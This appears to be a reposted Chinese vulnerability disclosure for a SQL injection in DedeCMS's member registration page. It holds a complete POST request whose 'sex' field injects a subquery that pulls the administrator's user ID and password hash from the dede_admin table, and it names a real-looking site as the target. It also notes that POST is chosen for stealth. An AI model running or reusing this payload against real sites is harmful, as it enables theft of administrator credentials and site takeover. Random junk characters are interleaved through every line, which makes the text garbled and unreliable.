漏洞类型: SQL注射漏洞& {+ A5 \# n; ?1 c: q, e
简要描述:
& h5 s2 h/ h5 y- `# R. l
! o6 U$ n. c0 F- z' }! a* T需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.% N* j3 Z; D5 |' A7 v( [8 W1 I6 M
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
: d3 P% \" M1 @2 C0 n5 f% r详细说明:跟这个漏洞
/ z; @; \) S6 T% j+ {
( P) X6 G) @& B4 N% m2 B v3 r8 kWooYun: Dedecms SQL注射导致审核机制绕过漏洞) I; B9 E/ B+ U0 u8 i& S/ T* L/ ]4 s
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
0 ~* Y. y+ ^- B/ {4 ~POST提交以下数据,其实不用POST提交的,这样隐蔽点.
! z$ Y/ Y a) Y5 Q) ^3 _; ?! a Z) n; P% y) I2 J1 l
www.political-security.com/member/reg_new.php
# A% O" u( \# y& Q6 Y ( n _* d: t+ w; ]& j1 D8 h2 Z t
POST) G. H% ?4 A3 H m$ {" x
$ B1 b! k) p1 n6 idopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
/ w: P7 D1 d& V9 yuserid=c4rp3nt3r&uname=c4rp3nt3r/ I' S6 y* e/ `
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss- ~0 h" t. @( l. s! V6 k
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
2 Z7 R- N5 i7 V5 a3 h/ C. u(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');5 E6 Y, C' }% U" R4 {& f* W/ j i4 H
%00&vdcode=glos&agree= |